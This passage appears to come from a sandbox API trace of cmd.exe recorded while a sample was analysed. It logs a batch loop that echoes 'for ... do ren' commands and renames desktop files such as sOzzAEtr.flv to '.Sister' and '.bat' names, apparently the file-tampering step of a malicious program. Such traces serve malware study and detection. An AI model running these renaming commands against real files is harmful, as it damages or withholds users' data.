| out: lpMode=0xa6cf4fe058) returned 1 [0177.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.365] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0177.401] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0177.574] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0177.574] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0177.574] malloc (_Size=0xffce) returned 0x21ed963ff00 [0177.574] ??_V@YAXPEAX@Z () returned 0x21ed963ff00 [0177.574] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0177.574] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0177.574] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0177.574] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0177.574] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0177.574] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0177.574] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0177.574] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0177.574] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0177.574] ??_V@YAXPEAX@Z () returned 0x1 [0177.574] GetProcessHeap () returned 0x21ed8c70000 [0177.574] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed937a050 [0177.575] GetProcessHeap () returned 0x21ed8c70000 [0177.575] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a050, Size=0x130) returned 0x21ed937a050 [0177.575] GetProcessHeap () returned 0x21ed8c70000 [0177.575] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a050) returned 0x130 [0177.575] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.575] malloc (_Size=0xffce) returned 0x21ed963ff00 [0177.575] ??_V@YAXPEAX@Z () returned 0x21ed963ff00 [0177.575] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.575] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed963ff00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0177.577] ??_V@YAXPEAX@Z () returned 0x1 [0177.577] GetProcessHeap () returned 0x21ed8c70000 [0177.577] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62bd0 [0177.581] GetProcessHeap () returned 0x21ed8c70000 [0177.581] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed937ba30 [0177.581] GetProcessHeap () returned 0x21ed8c70000 [0177.581] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937ba30, Size=0x130) returned 0x21ed937ba30 [0177.581] GetProcessHeap () returned 0x21ed8c70000 [0177.581] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937ba30) returned 0x130 [0177.581] malloc (_Size=0xffce) returned 0x21ed963ff00 [0177.581] ??_V@YAXPEAX@Z () returned 0x21ed963ff00 [0177.581] GetProcessHeap () returned 0x21ed8c70000 [0177.581] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64f80 [0177.581] GetProcessHeap () returned 0x21ed8c70000 [0177.581] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9482ff0 [0177.582] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0177.582] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0177.582] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0177.582] GetLastError () returned 0x2 [0177.582] GetProcessHeap () returned 0x21ed8c70000 [0177.582] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9528520 [0177.582] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9528530 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0177.582] SetErrorMode (uMode=0x0) returned 0x0 [0177.582] SetErrorMode (uMode=0x1) returned 0x0 [0177.582] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed963ff00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0177.582] SetErrorMode (uMode=0x0) returned 0x1 [0177.582] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0177.582] GetProcessHeap () returned 0x21ed8c70000 [0177.583] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed94834d0 [0177.583] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0177.583] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0177.583] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0177.583] GetLastError () returned 0x2 [0177.583] ??_V@YAXPEAX@Z () returned 0x1 [0177.583] malloc (_Size=0xffce) returned 0x21ed963ff00 [0177.583] ??_V@YAXPEAX@Z () returned 0x21ed963ff00 [0177.583] malloc (_Size=0xffce) returned 0x21ed964fee0 [0177.583] ??_V@YAXPEAX@Z () returned 0x21ed964fee0 [0177.583] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0177.583] GetLastError () returned 0x2 [0177.583] _get_osfhandle (_FileHandle=2) returned 0x54 [0177.583] GetFileType (hFile=0x54) returned 0x2 [0177.583] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0177.583] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0177.631] _get_osfhandle (_FileHandle=2) returned 0x54 [0177.631] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0177.687] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0177.687] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0177.687] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0177.713] longjmp () [0177.713] ??_V@YAXPEAX@Z () returned 0x1 [0177.713] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x211c8ad0, ftCreationTime.dwHighDateTime=0x1d5e77b, ftLastAccessTime.dwLowDateTime=0x10340cc0, ftLastAccessTime.dwHighDateTime=0x1d5e479, ftLastWriteTime.dwLowDateTime=0x10340cc0, ftLastWriteTime.dwHighDateTime=0x1d5e479, nFileSizeHigh=0x0, nFileSizeLow=0xe565, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="sOzzAEtr.flv", cAlternateFileName="")) returned 1 [0177.714] GetProcessHeap () returned 0x21ed8c70000 [0177.714] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937b630, Size=0x404) returned 0x21ed937bb70 [0177.714] GetProcessHeap () returned 0x21ed8c70000 [0177.714] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937bb70) returned 0x404 [0177.714] GetProcessHeap () returned 0x21ed8c70000 [0177.714] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9538510 [0177.715] GetProcessHeap () returned 0x21ed8c70000 [0177.715] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9538510, Size=0x30) returned 0x21ed9538510 [0177.715] GetProcessHeap () returned 0x21ed8c70000 [0177.715] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9538510) returned 0x30 [0177.715] GetProcessHeap () returned 0x21ed8c70000 [0177.715] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9538550 [0177.715] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0177.716] GetProcessHeap () returned 0x21ed8c70000 [0177.717] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2a) returned 0x21ed937a7f0 [0177.717] ??_V@YAXPEAX@Z () returned 0x1 [0177.717] GetProcessHeap () returned 0x21ed8c70000 [0177.717] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9538550, Size=0x140) returned 0x21ed9538550 [0177.717] GetProcessHeap () returned 0x21ed8c70000 [0177.717] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9538550) returned 0x140 [0177.717] GetProcessHeap () returned 0x21ed8c70000 [0177.717] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed95386a0 [0177.717] GetProcessHeap () returned 0x21ed8c70000 [0177.717] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed95386a0, Size=0x290) returned 0x21ed95386a0 [0177.717] GetProcessHeap () returned 0x21ed8c70000 [0177.717] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed95386a0) returned 0x290 [0177.717] GetProcessHeap () returned 0x21ed8c70000 [0177.717] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9538940 [0177.717] GetProcessHeap () returned 0x21ed8c70000 [0177.717] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9538940, Size=0x30) returned 0x21ed9538940 [0177.718] GetProcessHeap () returned 0x21ed8c70000 [0177.718] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9538940) returned 0x30 [0177.718] GetProcessHeap () returned 0x21ed8c70000 [0177.718] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9538980 [0177.718] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0177.718] GetProcessHeap () returned 0x21ed8c70000 [0177.718] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2a) returned 0x21ed937b2b0 [0177.718] ??_V@YAXPEAX@Z () returned 0x1 [0177.718] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0177.718] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x40, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d64fe0 [0177.718] FindClose (in: hFindFile=0x21ed8d64fe0 | out: hFindFile=0x21ed8d64fe0) returned 1 [0177.719] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x40, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d64fe0 [0177.719] FindClose (in: hFindFile=0x21ed8d64fe0 | out: hFindFile=0x21ed8d64fe0) returned 1 [0177.719] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x94358ebb, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x94358ebb, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x40, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d64fe0 [0177.719] FindClose (in: hFindFile=0x21ed8d64fe0 | out: hFindFile=0x21ed8d64fe0) returned 1 [0177.719] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\sOzzAEtr.flv", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x211c8ad0, ftCreationTime.dwHighDateTime=0x1d5e77b, ftLastAccessTime.dwLowDateTime=0x10340cc0, ftLastAccessTime.dwHighDateTime=0x1d5e479, ftLastWriteTime.dwLowDateTime=0x10340cc0, ftLastWriteTime.dwHighDateTime=0x1d5e479, nFileSizeHigh=0x0, nFileSizeLow=0xe565, dwReserved0=0x4, dwReserved1=0x40, cFileName="sOzzAEtr.flv", cAlternateFileName="")) returned 0x21ed8d650a0 [0177.719] FindClose (in: hFindFile=0x21ed8d650a0 | out: hFindFile=0x21ed8d650a0) returned 1 [0177.720] malloc (_Size=0x1ff9c) returned 0x21ed965fec0 [0177.721] ??_V@YAXPEAX@Z () returned 0x21ed965fec0 [0177.722] GetProcessHeap () returned 0x21ed8c70000 [0177.722] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45c50 [0177.722] ??_V@YAXPEAX@Z () returned 0x1 [0177.722] ??_V@YAXPEAX@Z () returned 0x1 [0177.722] GetProcessHeap () returned 0x21ed8c70000 [0177.722] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9538980, Size=0x140) returned 0x21ed9538980 [0177.722] GetProcessHeap () returned 0x21ed8c70000 [0177.722] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9538980) returned 0x140 [0177.722] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0177.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.722] GetFileType (hFile=0x50) returned 0x2 [0177.724] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0177.725] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0177.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.737] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0177.782] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0177.782] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0177.782] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0177.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.782] GetFileType (hFile=0x50) returned 0x2 [0177.782] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0177.782] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0177.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.816] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0177.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.828] GetFileType (hFile=0x50) returned 0x2 [0177.828] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0177.828] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0177.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.849] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9538520*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9538520*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0177.885] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"sOzzAEtr.flv\" \"sOzzAEtr.flv.Sister\" ") returned 38 [0177.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.885] GetFileType (hFile=0x50) returned 0x2 [0177.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0177.885] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0177.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.912] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x26) returned 1 [0177.941] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0177.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.941] GetFileType (hFile=0x50) returned 0x2 [0177.941] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0177.941] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0177.995] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0177.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.995] GetFileType (hFile=0x50) returned 0x2 [0177.995] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0177.995] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0178.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.018] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0178.036] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0178.036] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.036] GetFileType (hFile=0x50) returned 0x2 [0178.036] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.036] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0178.054] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.054] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0178.072] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0178.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.073] GetFileType (hFile=0x50) returned 0x2 [0178.073] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.073] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0178.138] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.138] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0178.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.157] GetFileType (hFile=0x50) returned 0x2 [0178.157] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.157] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0178.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.173] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9538950*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9538950*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0178.178] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"sOzzAEtr.flv.Sister\" \"sOzzAEtr.bat\" ") returned 38 [0178.179] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.179] GetFileType (hFile=0x50) returned 0x2 [0178.179] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.179] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0178.192] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.192] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x26) returned 1 [0178.211] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0178.211] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.211] GetFileType (hFile=0x50) returned 0x2 [0178.211] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.211] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0178.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.229] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0178.246] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0178.261] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0178.261] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0178.261] malloc (_Size=0xffce) returned 0x21ed965fec0 [0178.261] ??_V@YAXPEAX@Z () returned 0x21ed965fec0 [0178.262] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0178.262] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0178.262] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0178.262] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0178.262] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0178.262] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0178.262] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0178.262] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0178.262] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0178.262] ??_V@YAXPEAX@Z () returned 0x1 [0178.262] GetProcessHeap () returned 0x21ed8c70000 [0178.262] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa8) returned 0x21ed937e6c0 [0178.262] GetProcessHeap () returned 0x21ed8c70000 [0178.262] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937e6c0, Size=0x5c) returned 0x21ed937e6c0 [0178.262] GetProcessHeap () returned 0x21ed8c70000 [0178.262] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937e6c0) returned 0x5c [0178.262] GetProcessHeap () returned 0x21ed8c70000 [0178.262] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x64) returned 0x21ed8d63fc0 [0178.262] GetProcessHeap () returned 0x21ed8c70000 [0178.262] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa8) returned 0x21ed8d66cc0 [0178.262] GetProcessHeap () returned 0x21ed8c70000 [0178.262] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66cc0, Size=0x5c) returned 0x21ed8d66cc0 [0178.262] GetProcessHeap () 